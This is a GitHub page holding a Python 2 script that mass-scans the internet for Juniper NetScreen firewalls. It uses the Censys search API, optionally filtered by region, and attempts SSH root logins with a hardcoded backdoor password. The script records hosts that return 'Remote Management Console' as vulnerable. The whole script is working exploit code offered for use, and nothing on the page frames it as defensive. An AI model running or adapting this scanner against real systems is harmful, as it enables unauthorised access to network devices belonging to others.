forked from s0m30ne/JuniperBackdoor
/
JuniperBackdoor.py
135 lines (119 loc) · 3.38 KB
/
JuniperBackdoor.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
from pexpect import pxssh
from Queue import Queue
import threading
import time
import re
import sys
import json
import requests
import math
user = "root"
passwd = "<<< %s(un='%s') = %u"
API_URL = "https://www.censys.io/api/v1"
API_ID = "YOUR API ID"
SECRET = "YOUR SECRET"
PAGES = 50
cur_page = 1
thread_num = 20
over_num = 0
queue = Queue()
ip_OK = open("ip_OK.txt", "w")
class testTarget(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
global queue
global ip_OK
global over_num
global thread_num
is_over = False
while not is_over:
for i in range(5):
if not queue.empty():
ip = queue.get()
else:
is_over = True
over_num += 1
if over_num == thread_num:
ip_OK.close()
sys.exit()
break
theSSH = connectSSH(ip, user, passwd)
if theSSH:
before = theSSH.before
try:
theSSH.logout()
except:
pass
isval = re.search('Remote Management Console', before)
if isval:
print "%s is vul" % ip
ip_OK.write("%s\n" % ip)
ip_OK.flush()
else:
print "%s is not vul" % ip
time.sleep(1)
def connectSSH(host, user, passwd):
try:
ssh = pxssh.pxssh()
ssh.login(host, user, passwd, auto_prompt_reset=False)
return ssh
except Exception, e:
print "%s is not vul" % host
def getIp(query, page):
start_time = time.time()
data = {
"query": query,
"page": page,
"fields": ["ip"]
}
try:
res = requests.post(
API_URL + "/search/ipv4", data=json.dumps(data), auth=(
API_ID, SECRET))
except:
pass
else:
try:
results = res.json()
except:
pass
else:
if res.status_code != 200:
print "error occurred: %s" % results["error"]
sys.exit(1)
else:
result_iter = iter(results["results"])
for result in result_iter:
queue.put(result["ip"])
def test():
for i in range(thread_num):
t = testTarget()
t.start()
if __name__ == '__main__':
if len(sys.argv) != 2:
print """
usage:
using python JuniperBackdoor.py [region] to scan the hosts
in the region you set
using python JuniperBackdoor.py ALL to scan the hole world
"""
sys.exit()
else:
region = sys.argv[1]
if region == "ALL":
query = "22.ssh.banner.software_version:NetScreen"
elif region == "china":
query = "22.ssh.banner.software_version:NetScreen AND \
location.country:%s" % region
else:
query = "22.ssh.banner.software_version:NetScreen AND \
location.province:%s" % region
getIp(query, cur_page)
if not queue.empty():
test()
while queue.qsize() > 0:
if cur_page <= PAGES:
getIp(query, cur_page)
cur_page += 1
time.sleep(0.1)